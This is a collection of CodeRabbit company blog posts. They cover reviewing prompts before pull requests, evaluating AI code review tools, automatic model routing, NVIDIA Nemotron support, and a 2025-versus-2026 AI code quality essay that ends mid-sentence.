[![](https://victorious-bubble-f69a016683.media.strapiapp.com/fddf299bb1852395769b1a560b4d45b7294b25f2981ed2ed0301bf8ec7dea27d_7405958d67.png)](https://x.com/_hxmmed/status/2010792509572886746?s=20) Because LLM outputs can vary across runs, models, and configurations, approving a prompt does not necessarily mean approving the exact code that ultimately ships. For audits, ownership, and downstream liability, that distinction matters. In their view, code review cannot be replaced by “prompt approval” without weakening the guarantees that PR-based workflows were designed to provide. [![](https://victorious-bubble-f69a016683.media.strapiapp.com/0b2f365792c95d03084662947a4fadd2d10c0888597b1b44cbac3d7d3b9549b3_e20e3c23dd.png)](https://x.com/MisterMattRoth/status/2010806037683847656?s=20) The core disagreement, then, is not whether prompts should be part of review. It is where accountability should live in an AI-assisted workflow: primarily in the prompt, primarily in the code, or in a deliberately structured combination of both. ## What is a prompt request? A prompt request is exactly what it sounds like: a request by a developer for a peer review of their prompt before feeding it into an LLM to generate code. Or, in the case of multi-shot or conversational prompts, a review of the conversation between the developer and the agent. Instead of starting review at the diff level, a prompt request asks reviewers to evaluate the instructions given to the LLM so they can sign off on or contribute to the context, intent, constraints, and assumptions that guide the model’s output. A typical prompt request may include: * The system and user prompts * Relevant repository or architectural context * Model selection and configuration * Constraints, invariants, or non-goals * Examples of expected behavior The goal is to make explicit what the model was asked to do before evaluating how well it did it. [![](https://victorious-bubble-f69a016683.media.strapiapp.com/54a717efd8e848555c4188434238a7acb9c9d25e52173be0a4471cbd6c9351f2_dc83524e79.png)](https://x.com/harjotsgill/status/2010786965264973907?s=20) In this sense, a prompt request functions more like a design artifact than a code artifact. It captures intent at the moment of generation and helps ensure the prompt is comprehensive and explicit enough to address the requirements. It can help teams better align around how they prompt and ensure that everyone is using the same context to generate code. ## Good news: Prompt requests and pull requests are not in conflict Much of the debate this week stemmed from treating prompt requests and pull requests as competitors. Either you do a prompt request or a pull request, some commenters suggested. However, they shouldn’t be. After all, they address different failure modes at different stages of the development lifecycle. Just like you’re not going to skip testing because you did a code review, you shouldn’t skip a code review because you did a prompt request. Prompt requests are valuable because they ensure alignment and best practices early, before any code is generated or committed. They help teams align on what should be built, define boundaries, and constrain agent behavior. Because large language models are non-deterministic, capturing intent explicitly becomes even more important upstream, where variability is highest. A prompt request can also help ensure that a prompt is optimized for the specific model or tool that will be used to generate the code, something essential in ensuring the quality of the output of increasingly divergent models (something we’ve consistently found in our evals). [![https://github.com/clawdbot/clawdbot/pull/763](https://victorious-bubble-f69a016683.media.strapiapp.com/2524e09a5ce84b7030e8917f0006ffff378750bf9978f1b12aa8a3546848611c_24e631be6f.png)](https://github.com/clawdbot/clawdbot/pull/763) Pull requests remain essential later, when teams review the exact code that will ship. They preserve determinism, traceability, testing, auditing, and accountability. One captures intent. The other captures execution. Treating prompt requests as replacements for pull requests creates a false tension. Used together, they complement each other. Doing a prompt request and then skipping a pull request seems reckless and like tempting fate since the actual code produced hasn’t been validated. ## Why teams are drawn to prompt requests When done as part of the regular software development workflow that includes a thorough code review, prompt requests are a way to shift left and catch issues early. It ensures a team is aligned on the goals of the feature, can help optimize the prompt for the model it’s using, and can ensure that the proper context is being supplied to improve the generated output. This can cut down significantly on review and issues later on. When used alone without doing a pull request after the code is generated, the primary appeal of prompt requests is cognitive efficiency and speed. AI has dramatically increased the speed at which developers can produce code, but the review process has not kept pace. As AI-authored changes grow larger and more frequent, line-by-line review becomes increasingly difficult and cognitively taxing to complete. Subtle defects slip through not because engineers don’t care, but because reviewing enormous, machine-generated diffs is mentally taxing. Prompts, by contrast, are typically shorter and more declarative. Reviewing a prompt allows engineers to reason directly about scope, intent, and constraints without getting buried in implementation details produced by the model. Prompt-first review works particularly well for: * Scaffolding and boilerplate generation * Small changes * Greenfield prototypes * Fast-moving teams optimizing for iteration speed * Hobby projects where defects in prod aren’t that consequential In these cases, the most important question is often not “is every line correct?” but “is this what we meant to build?” ## Where prompt requests fall short When used in concert with pull requests, there are few downsides since they simply offer another opportunity to review the proposed code change before generation. The biggest one is the time and cognitive effort it takes and how this could become a new bottleneck for code generation if it takes too long to get a review. When treated as a replacement for pull requests, the biggest limitation of prompt requests is non-determinism. After all, the same prompt can produce different outputs across runs or models. That makes reviewing prompts a weak substitute for reviewing an auditable record of what actually shipped. From the perspective of git blame, compliance, or legal accountability, prompt reviews alone are insufficient. There are also real security and correctness risks. You might think you covered everything in your prompt but it may encode unsafe assumptions, omit edge cases, or fail to account for system-specific constraints that would normally be caught during careful code review. Reviewing intent does not guarantee that the generated output is secure, performant, or compliant. Finally, prompts are highly contextual. A prompt that looks reasonable in isolation can still produce problematic implementations if the reviewer lacks deep familiarity with the codebase, infrastructure, or runtime environment. While prompt reviews are designed to limit this by bringing in additional sets of eyes to improve the prompt, human reviewers make mistakes all the time on actual code. Add in the unpredictability of a model and that’s a recipe for bugs and downtime These risks increase as prompts are reused or gradually modified over time or if you change models. ## Prompt requests work best before pull requests Used together, prompt requests and pull requests offset each other’s weaknesses. A practical workflow might look like this: 1. A developer proposes a prompt request describing the intended change, constraints, and assumptions. This can involve just one prompt or a series of prompts for different parts of the code being generated. In the case of conversational prompts, the dev might propose a conversational response or share their transcript with the LLM after the fact. In that case, the review could help reprompt the agent to generate a better result. 2. The team reviews and aligns on the prompt(s) before code generation. 3. The code is generated and committed. 4. A traditional pull request reviews the concrete output for correctness, safety, and fit. In this model, prompt requests act as an upstream alignment step for AI-generated work. They reduce ambiguity early, potentially shrink downstream diffs, and make pull requests easier to review. Prompt requests do not replace the later rigor needed in pull requests. They just add more rigor earlier. ## Are prompt requests going to replace pull requests? Let’s be honest, prompt requests are unlikely to fully replace pull requests. No one thinks a large publicly traded company is going to trust AI-generated output so faithfully, they’ll bet their revenue (and future) on it without careful review. While we are bullish on prompt requests at CodeRabbit, the industry is still in the early stages of their adoption, and today’s LLMs are not capable of fully replacing pull requests. Will prompt requests work instead of pull requests for smaller open-source or single-maintainer projects? We are likely heading toward that reality sooner rather than later, but pull requests remain an essential part of the current software development lifecycle. This is especially true for production systems, regulated environments, or large teams with shared ownership and long-lived, complex codebases. Pull requests exist because software development ultimately involves shipping specific, deterministic artifacts into production. As long as that remains true, teams will need a concrete mechanism to review, test, audit, and approve the exact code that runs. The more realistic future is not prompt requests instead of pull requests. It is prompt requests before pull requests. What is becoming clear is that the quality of the prompt increasingly determines the quality of the output. Treating prompts as first-class artifacts acknowledges that reality without abandoning the safeguards that traditional code review provides. In that sense, “show me the prompt” does not remove accountability. It shifts some of it earlier, where it can reduce rework, surface intent, and make the pull request stage easier rather than unnecessary. ***Interested in trying CodeRabbit? Get a*** [***14-day free trial.***](https://coderabbit.link/kkJYt0S)

An (actually useful) framework for evaluating AI code review tools

David Loker — Fri, 09 Jan 2026 00:00:00 GMT

Benchmarks promise clarity. They’re supposed to reduce a complex system to a score, compare competitors side by side, and let the numbers speak for themselves. But, in practice, they rarely do. Benchmarks don’t measure “quality” in the abstract. They measure whatever the benchmark designer chose to emphasize, under the specific constraints, assumptions, and incentives of the evaluation. Change the dataset, the scoring rubric, the prompts, or the evaluation harness, and the results can shift dramatically. That doesn’t make benchmarks useless, but it does make them fragile, manipulable, and easy to misinterpret. Case in point: database benchmarks. ### Database benchmarks: A *cautionary* tale The history of database performance benchmarks is a useful example. As benchmarks became standardized, vendors learned how to optimize specifically for the test rather than for real workloads. Query plans were hand-tuned, caching behavior was engineered to exploit assumptions, and systems were configured in ways no production team would realistically deploy. Over time, many engineers stopped trusting benchmark results, treating them as marketing signals rather than reliable indicators of system behavior. ### AI code review benchmarks are on the same trajectory We’re currently seeing AI code review benchmarks go down a similar path. As models are evaluated on curated PR sets, synthetic issues, or narrowly defined correctness criteria, tools increasingly optimize for benchmark performance rather than for the messy, contextual, high‑stakes reality of real code review. The deeper problem is not just that benchmarks can be misleading, it’s that many “ideal” evaluation designs are difficult to execute correctly in real engineering environments. When an evaluation framework is too detached from real workflows, too easy to game by badly configuring your competitor’s tool, or too complex to run well, the results become hard to trust. What follows below is a practical framework for ***effectively*** evaluating AI code review tools that balances rigor with feasibility, and produces results that are both meaningful and interpretable. ## **Start from your objectives and make them explicit** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0c87e4def55b84c624be10984e21c7930471cbcfdf223e5ede203fcb37e9dace_df0f373fd7.png) Before assembling datasets or choosing metrics, it’s critical to define what you actually care about. “Better code review” means different things to different teams, and an evaluation that doesn’t encode those differences will inevitably optimize for the wrong outcome. Common objectives include: * Catching real defects and risks before merge * Improving long‑term maintainability and reducing technical debt * Avoiding low‑value noise that degrades review quality * Maintaining developer trust and adoption It’s also important to distinguish between **leading indicators** and **lagging indicators**. Outcomes like fewer production incidents or higher long‑term throughput are real and important, but they often emerge over months, not weeks. Shorter evaluations should focus on signals that correlate strongly with those outcomes, such as the quality of issues caught, whether they are acted on, and how developers respond to the tool. Explicitly ranking your objectives such as quality impact, precision, developer experience, and throughput, helps ensure that your evaluation answers the questions that actually matter to your organization. ## Determine what kind of evaluation is needed ![](https://victorious-bubble-f69a016683.media.strapiapp.com/83ecf697883bebb9137093fa7fd2879939df727dcb31797a443343fc97330c14_7175e4ce00.png) The most reliable evaluation of any tool involves a real-world pilot over a controlled offline benchmark. This allows you to see how it works in day-to-day situations versus just evaluating a tool based on criteria defined by a third party vendor. ### In-the-wild pilot The most reliable signals come from observing how a tool behaves in real, day‑to‑day development. Real‑time evaluation reflects actual constraints: deadlines, partial context, competing priorities, and human judgment. It shows not just what a tool can detect in theory, but what it surfaces in practice, and whether those issues matter enough for developers to act on them. For this, select a few teams or projects for each tool and run each tool for a period of time under normal usage. Measure things like: * Real-world detection of issues. * Severity of issues caught. * Developer satisfaction and perceived utility. If possible, design A/B style experiments so you can measure using the tool vs no tool on comparable teams or repos or Tool A vs Tool B on similar workloads, perhaps alternating weeks or branches. ### Offline benchmark For teams that want additional confidence, controlled detection comparisons can provide useful insight if you design it yourself using your own pull requests and criteria so it gives you the data you actually need. However, it’s not required in most cases since it doesn’t provide as much useful data as a pilot and can be time intensive to set up. One practical approach is to use a private evaluation or mirror repository. A small, representative set of pull requests can be replayed, allowing multiple tools to be run on the same diffs without disrupting real workflows. These comparisons are best used to understand coverage differences by severity and category, and to identify systematic strengths and blind spots across tools. After that, you just need to compute the metrics you’re looking to track. For example: * Precision/recall by severity and issue type. * Comment volume and distribution. ## **Why evaluating multiple tools on the same pull request is usually misleading** If you want to do a head-to-head comparison via either a benchmark or a pilot, a common instinct is to run them all on the same exact pull requests rather than mirroring that PR and running each tool you’re comparing separately on it or running them on different but comparable PRs. On the surface, running them all simultaneously feels fair and efficient. In practice, it introduces serious problems. **When multiple AI reviewers comment on the same PR:** Human reviewers are overwhelmed with feedback and cognitive load spikes. No single tool can be experienced as it was designed to be used in that case. For example, some tools skip comments if they see another tool has already made that comment leading to the perception that that tool hasn’t found the issue. Review behavior changes—comments are skimmed, bulk‑dismissed, or ignored This creates interference effects. Tools influence each other’s perceived usefulness, and attention, not correctness, becomes the limiting factor. Precision metrics degrade because even high‑quality comments may be ignored simply due to volume. That makes it harder to know the percentage of comments your team would accept from each individual tool under normal usage. The result is that you lose the ability to evaluate usability, trust, workflow fit, and real‑world usefulness. You are no longer measuring how a tool performs in practice, but how reviewers cope with noise. Running multiple tools on the same exact PR can be useful in narrow, controlled contexts, such as offline detection comparisons, but it is a poor way to evaluate the actual experience and value of a code review tool. To understand whether a tool helps your team, it often best be experienced in isolation within a normal review workflow. ## Structuring fair comparisons without complex infrastructure There are practical ways to compare tools without building elaborate experimentation harnesses. **Parallel evaluation across repos or teams** is often the simplest approach. Select repos or teams that are broadly comparable in language, domain, and PR volume, and run different tools in parallel. Keep configuration effort symmetric and analyze results using normalization techniques (discussed below). Alternatively, **time‑sliced evaluation within the same repo or team** can work when parallel groups are not available. Run one tool for a defined period, then switch. This approach requires acknowledging temporal effects—release cycles, workload changes, learning effects—but can still produce useful, directional insights when interpreted carefully. Finally, simply **mirroring PRs and running reviews on them with separate tools** also works well, if you want to compare comments on the same PRs. In all these cases, the goal is to preserve a clean developer experience while collecting comparable data. In practice, these approaches can also be combined if a team feels like that’s helpful to give them a better idea of how a tool works. Teams may start with parallel evaluation across different repositories or teams, then swap tools after a fixed period. This helps balance differences in codebase complexity or workload over time, while still avoiding the disruption and interference that comes from running multiple tools on the same pull request. As with any time-based comparison, results should be normalized and interpreted with awareness of temporal effects, but this hybrid approach often provides a good balance of fairness, practicality, and interpretability. ## **Metrics that produce interpretable results** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4ef99ab93155af4ddd13fcb2f944a09569953839c049c827c2e48475613b3a5d_054bcf8d74.png) Based on successful deployments across thousands of repositories, we've identified a framework of seven metric categories that provide a complete picture of your integration which we suggest as metrics to measure to our customers. Each category answers a specific question about your AI implementation: 1. **Architectural Metrics** – Is the tool appropriately integrated? How many of an org’s repos are connected, how many extensions are they using (git, IDE, CLI). 2. **Adoption Metrics** – Are developers actually using it? These metrics include monthly active users (MAU), the percentage of total repositories covered and week-over-week growth. 3. **Engagement Metrics** – Are they just ignoring it or actively collaborating with it? These metrics include PRs reviewed versus Chat Sessions initiated. Also track “Learnings used,” how often the AI applies context from previous reviews to new ones. 4. **Impact Metrics** – Is it catching bugs that matter to the team? These metrics include number of issues detected, actionable suggestions, and the “acceptance rate” (percentage of AI comments that result in a code change). 5. **Quality & Security Metrics** – Is it preventing expensive bugs and security vulnerabilities? These metrics include Linter/SAST findings, security vulnerabilities caught (e.g., Gitleaks), and reduction in pipeline failures. 6. **Governance Metrics** – Is it enforcing standards across the team? These metrics include usage of pre-merge checks, warnings vs. errors, and implementation of custom governance rules. 7. **Developer Sentiment** – Are the developers happy with their experience and product? These metrics include survey results, qualitative feedback, and “aha” moments. ### **Accepted issues as a primary quality signal** Not all metrics are equally informative and some are far easier to misread than others. A practical evaluation should focus more attention on signals that are both meaningful and feasible to measure. One of the strongest indicators of value is whether a tool’s feedback leads to real action. An issue can reasonably be considered **accepted** when: * A subsequent commit addresses the comment or thread * A reviewer explicitly acknowledges that the issue has been resolved This behavioral signal captures correctness, relevance, and usefulness in a way that pure scoring metrics cannot. Accepted issues should be reported by: * **Severity** (e.g., critical, major, minor, low, nitpick) * **Category** (security, logic, performance, maintainability, testing, etc.) Both absolute counts and rates are informative, especially when interpreted together. ### **Precision and signal‑to‑noise** Acceptance rate (accepted issues relative to total surfaced) is a practical proxy for precision. On its own, it is insufficient; paired with comment volume, it becomes far more meaningful. High comment volume with low acceptance is a clear signal of noise. Patterns of systematically ignored categories or directories often reveal where configuration or tuning is needed. It’s also important to avoid the “LGTM trap.” That means a tool that leaves very few comments, all correct, may appear precise while missing large classes of issues. In many cases, broad coverage combined with configurability is preferable to narrow precision that cannot be expanded. ### **Coverage and issue discovery in real review flows** In typical workflows, the sequence is: PR opens → AI review → issues fixed → human review Because humans review after the tool, it is often impossible to say with certainty which issues humans would have caught independently. Instead of trying to infer counterfactuals precisely, focus on practical signals: * Accepted issues that led to substantive code changes * Accepted issues in categories humans historically miss (subtle logic, edge cases, maintainability) * Consistent patterns of issues surfaced across PRs Sampling can help here. Reviewing a subset of PRs and asking, “Would this issue likely have been caught without the tool?” is often more informative than attempting exhaustive labeling. ### **Normalization: Making comparisons fair** Raw counts are misleading when pull requests vary widely in size and complexity. Normalization is essential for fair comparison. Useful normalization dimensions include: * PR size (lines changed, files touched) * PR type (bug fix, feature, refactor, infra/config, test‑only) * Domain or risk area (frontend/backend, high‑risk components) Comparisons should be made within similar buckets, and distributions are often more informative than averages. Small samples at extremes should be interpreted cautiously. ## **Interpreting throughput and velocity** Throughput metrics like time‑to‑merge are easy to misread. When a tool begins catching real issues that were previously missed, merge times may initially increase. This often reflects improved rigor rather than reduced productivity. Throughput should therefore be treated as a secondary metric, normalized by PR complexity and evaluated over time alongside quality indicators. Short‑term slowdowns can be a leading indicator of long‑term gains in code health. ## **Bringing it all together** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b2f514912ab22c31e2c39994d7c2874f0f9660c4fb1a6103cfc9692e063092e3_bc6cc3c7e3.png) A reliable evaluation does not require perfect benchmarks or elaborate experimental design. It requires clarity about objectives, careful interpretation of metrics, and an emphasis on real‑world behavior. Start with normal workflows and behavioral signals. Normalize to make comparisons fair. Use controlled comparisons selectively to deepen understanding. Combine quantitative metrics with concrete examples of impact ## **Final takeaway** Benchmarks are useful starting points, not verdicts. The most trustworthy evaluations of AI code review tools are grounded in real workflows, user behavior‑based signals, and balance rigor with practicality. When done well, they provide confidence not just that a tool performs well on paper, but that it meaningfully improves both the immediate quality of code changes and the long‑term health of the codebase. ***Curious how CodeRabbit performs on your codebase? Get a*** [***free trial today!***](https://coderabbit.link/QjWcnUj)

Why users shouldn’t choose their own LLM models: Choice is not always good

David Loker — Fri, 09 Jan 2026 00:00:00 GMT

Giving users a dropdown of LLMs to choose from often seems like the right product choice. After all, users might have a favorite model or they might want to try the latest release the moment it drops. One problem: unless they’re an ML engineer running regular evals and benchmarks to understand where each model actually performs best, that choice is liable to hurt far more than it helps. You end up giving users what they think they want, while quietly degrading the quality of what they produce with your tool with inconsistent results, wasted tokens, and erratic model behavior. For example, developers may unknowingly pick a model that’s slower, less reliable for their specific task, or tuned for a completely different kind of reasoning pattern. Or they might choose a faster model than they need that won’t comprehensively reason through the task. Choosing which model to use isn’t a matter of personal taste… It's a systems-level optimization problem. The right model for any task depends on measurable performance across dozens of task dimensions, not just how recently it was released or how smart users perceive it to be. And that decision should belong to engineers armed with eval data, not end users who wrongly believe they’ll get better results with the model they personally prefer. ## **The myth of *‘preference’* in AI model selection** Many AI platforms love to market model choice as a premium feature. “Choose GPT-4o, Claude, or Gemini” sounds empowering and gives users the impression that they will get the best or latest experience. It taps into the same instinct that makes people want to buy the newest phone the week it launches: the feeling that *newer* and *bigger* must mean *better*. The reality, though, is that most users have no idea which model actually performs best for their specific use case. And even if they did, that answer would likely shift from one query to another. The “best” model for code generation might not be the “best” for bug detection, documentation, or static analysis. There might also be multiple models that are best at different parts of a code review or other task, depending on what kind of code is being reviewed. Some tasks require greater creativity and reasoning depth; others need precision and consistency. A developer who blindly defaults to “the biggest model available” for coding help, often ends up with slower, more expensive, and less deterministic results. In some cases, a smaller, domain-tuned model will handily outperform its heavyweight cousin. ## **Why model selection is an *evaluation* problem, not preference** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/afe64f3cbb7380673831ed8effc61d607fed9ec3125a6751dc4f2662afe9a667_c6f0274264.png) Model selection isn’t a matter of taste… it's a data problem. Behind the scenes, engineers run thousands of evaluations across tasks like code correctness, latency, context retention, and tool integration. These aren’t one-time benchmarks; they’re continuous systems designed to measure how models actually perform under specific, reproducible conditions. The results form a kind of performance map which shows which model excels at refactoring versus summarizing code or which one handles long-context reasoning without drifting off-topic. End users never see that map. While some might read benchmarks or articles about a model’s performance, most are making decisions blind, guided mostly by hunches, Reddit posts, or vague impressions of “smartness.” Even if they wanted to, users rarely have the time or infrastructure to run their own evals across hundreds of tasks and models. The result is that people often optimize for hype rather than outcomes… choosing the model that feels cleverest or sounds more fluent, not the one that’s objectively better for the job. And human perception alone is a terrible way to evaluate model competence. A model that seems chatty and confident can be consistently wrong, while one that feels hesitant might actually deliver the most accurate, reproducible results. Without hard data from evaluations, those distinctions disappear. ## **The prompting paradox** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9ced408c9e0d54febda787ff0254b0affc4ff47aaac1537a92dcc168f24992ec_d1deb33f43.png) One critical drawback to choosing your own model is that no two LLMs *think* alike. Each model interprets prompts slightly differently. Some are more literal, others more associative; some favor verbosity, others prefer minimalism. A prompt that works perfectly on GPT-5 might completely derail on Sonnet 4.5, leading to hallucinated code, missing context, or an output that ignores key constraints. Temperature, context length, and formatting differences only make the problem worse. A model with a higher temperature parameter might produce creative explanations but rewrite variable names, while another with stricter formatting rules could break markdown or indentation. These small mismatches can quietly poison a workflow, especially in environments where consistent structure matters most like with code reviews, diff comments, or documentation summaries. When users choose their own models, they unknowingly disrupt the prompt-engineering assumptions that keep those workflows stable in systems where the prompts are written for the user. Every prompt is tuned with certain expectations about how the model parses instructions, handles errors, and formats its output. Swap out the model and those assumptions collapse. It’s even harder to navigate in situations where the user writes the prompt themselves, like with AI coding tools. Users rarely have enough context, knowledge, and experience to write effective prompts for each model. However, over time, they might find a few prompting methods that help them get the best out of a particular model. If they later change to a new model, they often find their old prompts aren’t as effective and need to learn from scratch trying to get the best results from that new model. That’s why well-designed systems rely on **model orchestration**, not user preference. In review pipelines or agentic systems, predictability is everything. You need each component to behave consistently so downstream tools and other models can interpret the results. Giving users the freedom to swap models isn’t customization; it’s chaos engineering without the safety net. ## **The hidden costs of model freedom** Once users can switch models at will, all the invisible consistency that makes AI-assisted workflows dependable begins to crumble. The consequences aren’t abstract; they’re measurable and they multiply fast. Across teams, the first thing you notice is inconsistency. Two developers can run the same review prompt and get completely different feedback. One gets a precise diff comment, the other might get a philosophical musing on the meaning of clean code. That inconsistency makes it impossible to reproduce results, which is deadly for any process that relies on traceability or QA. Then there’s cost. Larger models burn through tokens faster and often respond slower, introducing both financial waste and latency drag. And when users unknowingly pick models with shorter context windows, the result is truncated inputs or missing context. It’s like asking someone to summarize a novel after reading only half of it. ## **The better alternative: Dynamic, data-driven routing** The smarter alternative to user-driven chaos is dynamic, data-driven routing. That means systems that automatically choose the right model for the right task. Instead of asking users to guess which LLM might perform best, auto-routing engines make that choice in real-time based on metrics, evals, and historical performance. Think of it as orchestration, not selection. A large model might be routed in for creative reasoning, open-ended problem solving, or complex code explanations. A smaller, domain-tuned model might handle deterministic checks, linting, or static analysis where precision and speed matter more than eloquence. The system continuously evaluates the outcomes tracking correctness, latency, and user feedback in order to refine its routing logic over time. This approach turns what used to be human guesswork into an adaptive, evidence-based process. The routing system learns which models excel at which tasks, under which conditions, and how to balance cost, speed, and quality. Advanced teams already operate this way. In **CodeRabbit**, for example, the orchestration layer sits between the user and the models, using structured prompts, eval data, and performance histories to dispatch requests intelligently. Developers don’t have to think about which LLM is behind a particular review comment. The system has already chosen the optimal one, validated against internal benchmarks. In short, dynamic routing makes model choice invisible. The user gets consistently high-quality results; the engineers get measurable control and efficiency. Everyone wins. Except the dropdown menu. ## **Expertise is in the system, not the slider** The takeaway here is simple: model selection isn’t a feature, it’s a quality control issue. The best results come from systems that make those choices invisibly and are grounded in data, not gut instinct. When model routing is automatic and performance-based, users get consistent, high-quality outputs without needing to think about which model is doing the work. Every product that puts a “Choose your LLM” dropdown front and center is outsourcing an engineering decision to the least equipped person to make it. Or, put another way: **the best AI tool UI is no LLM dropdown at all.** ***Curious what it looks like when an AI pipeline optimizes for LLM fit?*** [***Try CodeRabbit for free today!***](https://coderabbit.link/br1LHRx)

CodeRabbit's AI Code Reviews now support NVIDIA Nemotron

Sahil Mohan Bansal — Mon, 05 Jan 2026 00:00:00 GMT

TL;DR: Blend of frontier & open models is more cost efficient and reviews faster. NVIDIA Nemotron is supported for CodeRabbit self-hosted customers. We are delighted to share that CodeRabbit now supports the [NVIDIA Nemotron](https://developer.nvidia.com/nemotron?ncid=pa-srch-goog-405472&_bt=785763502016&_bk=nvidia%20nemotron&_bm=p&_bn=g&_bg=194843200048&gad_source=1&gad_campaignid=23296574832&gbraid=0AAAAAD4XAoH92Ikfem4gRmk2l43ihyoMZ&gclid=CjwKCAiAjc7KBhBvEiwAE2BDOUJ675w2dEUGzWfCsu26BnfRGvO40xVPRh1PPGasRkAvJUjOmPDHYxoCDf4QAvD_BwE) family of open models among its blend of Large Language Models (LLMs) used for AI code reviews. Support for Nemotron 3 Nano has initially been enabled for CodeRabbit’s self-hosted customers running its [container image](https://docs.coderabbit.ai/self-hosted/github) on their infrastructure. Nemotron is used to power the context gathering and summarization stage of the code review workflow before the frontier models from OpenAI and Anthropic are used for deep reasoning and generating review comments for bug fixes. ## How Nemotron helps: Context gathering at scale This new blend of open and frontier models allows us to improve the overall speed of context gathering and improves cost efficiency by routing different parts of the review workflow to the appropriate model family, while delivering review accuracy that is at par with running frontier models alone. High quality AI code reviews that can find deep lying and hidden bugs require lots of context gathering related to the code being analyzed. The most frequent (and most token-hungry) work is summarizing and refreshing that context: what changed in the code and does it match developer intent, how do those changes connect with rest of the codebase, what are the repo conventions or custom rules, what external data sources are available to aid the review, etc. This context building stage is the workhorse of the overall AI code review process and it is run several times iteratively throughout the review workflow. [NVIDIA Nemotron 3 Nano](https://huggingface.co/nvidia/NVIDIA-Nemotron-3-Nano-30B-A3B-BF16) was built for high-efficiency tasks and its large context window (1 million tokens) along with fast speed helps to gather a lot of data and run several iterations of context summarization and retrieval. ![CodeRabbit architecture with Nemotron support](https://victorious-bubble-f69a016683.media.strapiapp.com/7a9e6ce3c56ea918223970a7b0f583404a26f58d91cd2ee9e8f6bba5bb074ecf_8e72bb8830.png) ## **Blend of frontier and Open Models** When you open a Pull Request (PR), CodeRabbit’s code review workflow is triggered starting with an isolated and secure sandbox environment where CodeRabbit analyzes code from a clone of the repo. In parallel, CodeRabbit pulls in context signals from several sources: * Code and PR index * Linter / Static App Security Tests (SAST) * Code graph * Coding agent rules files * Custom review rules and Learnings * Issue tickets (Jira, Linear, Github issues) * Public MCP servers * Web search To dive deeper into our context engineering approach you can check out our blog: [The art and science of context engineering for AI code reviews](https://www.coderabbit.ai/blog/the-art-and-science-of-context-engineering). A lot of this context, along with the code diff being analyzed, is used to generate a PR Summary before any review comments are generated. This is where open models come in. Instead of sending all of the context to frontier models, CodeRabbit now uses Nemotron Nano v3 to gather and summarize the relevant context. Summarization is at the heart of every code review and is the key to delivering high signal-to-noise in the review comments. After the summarization stage is completed the frontier models (e.g., OpenAI GPT-5.2-Codex and Anthropic Claude-Opus/Sonnet 4.5) perform deep reasoning to generate review comments for bug fixes, and execute agentic steps like review verification, pre-merge checks, and “finishing touches” (including docstrings and unit test suggestions). ## What this means for our customers CodeRabbit is now enabling Nemotron-3-Nano-30B support (initially for its self-hosted customers) for the context summarization part of the review workflow along with the frontier models from OpenAI and Anthropic. This results in faster code reviews without compromising quality. We are also delighted to support the [announcement from NVIDIA](https://blogs.nvidia.com/blog/open-models-data-tools-accelerate-ai) today about the expansion of its Nemotron family of open models and are excited to work with the company to help accelerate AI coding adoption across every industry. [Get in touch](https://www.coderabbit.ai/contact-us/sales) with our team to access CodeRabbit’s container image if you would like to run AI code reviews on your self-hosted infrastructure.

2025 was the year of AI speed. 2026 will be the year of AI quality.

Aravind Putrevu — Wed, 31 Dec 2025 00:00:00 GMT

The year 2025 will be remembered as the moment AI-assisted software development entered its acceleration era. Improvements in the capabilities of coding agents, copilots, and automated workflows allowed teams to move faster than ever. But alongside that acceleration came a growing tension. Teams were shipping code at unprecedented velocity, yet trust in AI-generated changes didn’t grow at the same rate. Developers reported feeling both empowered and uneasy: they could produce more output, but they couldn’t always be certain that the output was correct. Postmortems, operational incidents, and late-stage defects increasingly pointed to subtle logic errors, configuration oversights, and design misunderstandings introduced by AI. We recently wrote about how [2025 had an unprecedented number of incidents](https://www.coderabbit.ai/blog/why-2025-was-the-year-the-internet-kept-breaking-studies-show-increased-incidents-due-to-ai). And our recent [State of AI vs. Human Code Generation Report](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report?) found that AI code has 1.7x more issues and bugs in it. That trust gap is now impossible to ignore and it sets the stage for what comes next. If 2025 was the year of speed, then 2026 will be the year of quality, the moment when engineering organizations shift their focus from just “how fast can we generate code?” to an equal focus on “how confident can we be in the code we ship?” The industry is moving into a new phase, one defined not *just* by acceleration, but *also* by accountability, reliability, and correctness. We’ll share how we got here and the 4 shifts that companies should make to how they use AI in 2026. ## **2025: The year of speed** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5259d25a0d7274f4f7d8186c3692f39ebfdde8ca490d3e7e5d7c83a91addb5e8_a5772b2773.png) 2025 was the year when “ship faster” crystallized into a core performance metric for engineering organizations. Leaders often emphasized velocity, tracking PR throughput, diff volume, cycle time, and the raw number of AI-assisted changes as measures of progress. Many companies positioned AI-generated code as a symbol of innovation and sometimes even as a badge of competitiveness. Major players like Microsoft and Google highlighted [how much of their code was now produced or assisted by AI](https://www.coderabbit.ai/blog/ai-code-metrics-what-percentage-of-your-code-should-be-ai-generated), framing volume as the signal to watch. The focus was on scale: how much code AI could help generate, how quickly, and with how little human intervention. Quality, consistency, and maintainability became secondary concerns in the conversation. ### **The hidden costs: Operational incidents and quality regressions** But the speed came with a cost. As teams pushed more AI-authored code into production, a surge of subtle defects began surfacing later in the release cycle. Issues that were once caught through careful review or design deliberation now slipped through. SRE and operations teams bore much of the impact. Incident reports revealed misaligned assumptions between human-written components and AI-generated logic. Infrastructure configurations created by AI introduced fragility that wasn’t always immediately visible. Our [recent report](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) found that AI generated code had up to 75% more logic and correctness issues in areas that were more likely to contribute to downstream incidents. As 2025 progressed, more production [incidents and postmortems pointed to AI-generated code](https://www.coderabbit.ai/blog/why-2025-was-the-year-the-internet-kept-breaking-studies-show-increased-incidents-due-to-ai?) as a contributing factor. ### **Developers felt empowered by AI in 2025, but uneasy about the code produced** For developers, 2025 was both liberating and unsettling. Many described feeling genuinely empowered: able to build more, experiment more, and clear more tasks in less time. Yet, alongside that empowerment came growing discomfort about the reliability of the code being produced. Developers increasingly reported moments where the AI-generated solution “looked right” but didn’t feel trustworthy. Reviewing AI-authored code often proved more cognitively demanding than writing it from scratch (something we [wrote about here](https://www.coderabbit.ai/blog/its-harder-to-read-code-than-to-write-it-especially-when-ai-writes-it)), and subtle errors could be easy to miss in large, machine-generated diffs. ## **Why quality became the pain point no one could ignore** By the end of 2025, the industry-wide trust gap in AI-generated code had become too large to ignore. We heard this firsthand when we themed our booth at re:Invent around the 